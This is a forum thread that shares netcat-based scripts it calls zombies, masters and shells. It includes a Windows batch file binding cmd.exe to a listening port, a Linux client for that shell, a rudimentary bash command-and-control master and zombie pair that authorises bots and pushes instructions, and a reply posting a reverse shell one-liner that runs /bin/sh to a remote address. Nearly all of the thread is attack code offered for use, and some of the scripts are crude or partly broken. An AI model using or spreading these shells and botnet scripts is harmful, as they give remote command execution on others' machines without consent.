Linux & Windows Clients Zombies Masters & Shells
Page 1 of 1
Linux & Windows Clients Zombies Masters & Shells
Linux & Windows Clients Zombies Masters & Shells
You will have to make sure localhost is set or an ip aswell as ports allowed in firewalls and port forwarding in router.
You will also need to run the bat files in same folder as netcat, download netcat.
You can run z.bat file -b and run in background aswell. double check on google.
Windows Reverse Shell Server
Linux Client For Above Remote Script
Linux C&C Example
Zombie Side (for linux)
You will have to make sure localhost is set or an ip aswell as ports allowed in firewalls and port forwarding in router.
You will also need to run the bat files in same folder as netcat, download netcat.
You can run z.bat file -b and run in background aswell. double check on google.
Windows Reverse Shell Server
- Code:
@echo off
cls
nc -Lp 778 -vv -e cmd.exe
Linux Client For Above Remote Script
- Code:
#!bin/bash
nc 192.168.0.10 778
Linux C&C Example
- Code:
#!/bin/bash
# Usage: ./master.sh
connect(){
#
newc=0
}
function runl(){
clear
echo "C&C Master Controller"
echo "Listening On Internal Port 778"
echo "Waiting For Zombie To Connect"
echo ""
sudo nc -l -p 778 > rmsg.txt
cat rmsg.txt
valuec=`cat rmsg.txt`
#out=cat 'rmsg.txt'
connected="0"
assign="1"
#host_to="localhost" # until we can use real ip
host_to="192.168.0.3" # until we can use real ip
inst="instructions"
((connected++))
host=localhost
if [ $connected -gt 0 ]
# if [ $connected -eq 1 ]
then
connected_msg="New Zomibe Connected"
echo "$connected_msg"
echo "Number Currently Connected $connected"
if [ "$valuec" = "Hello" ]
then
echo "Authorizing Zombie"
sleep 1.3 # give time for the listener to get 100% established
echo $inst | nc $host_to 779
else
echo "Connection Unsecured! Bot Refused!"
fi
# $assign ++
fi
# get rmsg.txt intoa var
}
# connect
runl
#sleep 10
#bash master_d.sh
Zombie Side (for linux)
- Code:
#!/bin/bash
# Usage: ./z.sh "localhost"
#myvar="$@"
host="$@"
if [ -z "$*" ]; then
host=localhost
fi
ifconfig | awk '/inet addr/{print substr($2,6)}' > ip.txt
ip=`cat ip.txt`
myvar="Hello"
#
echo $myvar | nc $host 778 # inital port
#sleep 0.1
# Authorizing Zombie
# this will only work if your on the local network or vpn
sudo nc -l -p 779 > rmsg.txt # return data port
cat rmsg.txt
Last edited by jamied_uk on 25th July 2016, 01:47; edited 1 time in total
Re: Linux & Windows Clients Zombies Masters & Shells
Linux Shell Server (Reverse Shell)
- Code:
#!/bin/bash
nc -e /bin/sh 10.0.0.1 1234
Re: Linux & Windows Clients Zombies Masters & Shells
Update Code Link
app.box.com/s/bigc8irz90gb72z1zr67jqprkst89f1c
app.box.com/s/bigc8irz90gb72z1zr67jqprkst89f1c
Similar topics
» Linux, Shells and You!
» Kali Linux in the Windows App Store || Kali Linux 2018.2 Launch
» Secure Netcat For Windows & Linux
» Linux Subsystem On Windows 10
» Wireshark For Windows & Linux
» Kali Linux in the Windows App Store || Kali Linux 2018.2 Launch
» Secure Netcat For Windows & Linux
» Linux Subsystem On Windows 10
» Wireshark For Windows & Linux
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|